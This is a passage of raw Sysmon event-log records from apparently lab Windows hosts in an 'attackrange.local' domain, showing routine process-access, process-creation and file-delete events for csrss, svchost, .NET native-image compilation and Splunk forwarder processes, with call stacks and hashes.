ll.dll+51781 10341000x800000000000000050358Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:55.510{85C0FFC9-B7EC-607E-0500-00000000BB01}4161008C:\Windows\system32\csrss.exe{85C0FFC9-EBF3-607E-EA06-00000000BB01}3788C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050357Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:55.510{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EBF3-607E-EA06-00000000BB01}3788C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050356Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:55.510{85C0FFC9-EBF3-607E-EA06-00000000BB01}3788C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000076491Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.967{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF4-607E-B20D-00000000BB01}5648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000076490Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.967{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48EE77CCD35FBAD7F7A1D2CD280B239F,SHA256=C2F1010774ACB554B2B2F21B8CAA527FF4A320196AD77C824BA0951FDD64DC02,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076489Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.951{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF4-607E-B20D-00000000BB01}5648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076488Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.951{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF4-607E-B20D-00000000BB01}5648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076487Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.936{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4C9691BEA6150379E1D8FF3CBD6AB2E,SHA256=D7D19EECEFDEA2E45EC5F89AAED5F0A28743FDD2B94B4D90E05AA146D6FF85C5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076486Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.920{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF4-607E-B10D-00000000BB01}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076485Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.904{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF4-607E-B10D-00000000BB01}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076484Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.904{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF4-607E-B10D-00000000BB01}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076483Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.858{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF4-607E-B00D-00000000BB01}5600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076482Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.842{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF4-607E-B00D-00000000BB01}5600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076481Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.842{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF4-607E-B00D-00000000BB01}5600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076480Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.795{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF4-607E-AF0D-00000000BB01}6440C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076479Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.779{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBF4-607E-AF0D-00000000BB01}6440C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076478Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.779{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF4-607E-AF0D-00000000BB01}6440C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076477Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.748{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF4-607E-AE0D-00000000BB01}6000C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076476Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.733{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF4-607E-AE0D-00000000BB01}6000C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076475Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.733{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF4-607E-AE0D-00000000BB01}6000C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076474Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.701{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF4-607E-AD0D-00000000BB01}3460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076473Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.686{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF4-607E-AD0D-00000000BB01}3460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076472Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.686{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF4-607E-AD0D-00000000BB01}3460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076471Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.639{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF4-607E-AC0D-00000000BB01}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076470Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.623{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBF4-607E-AC0D-00000000BB01}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076469Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 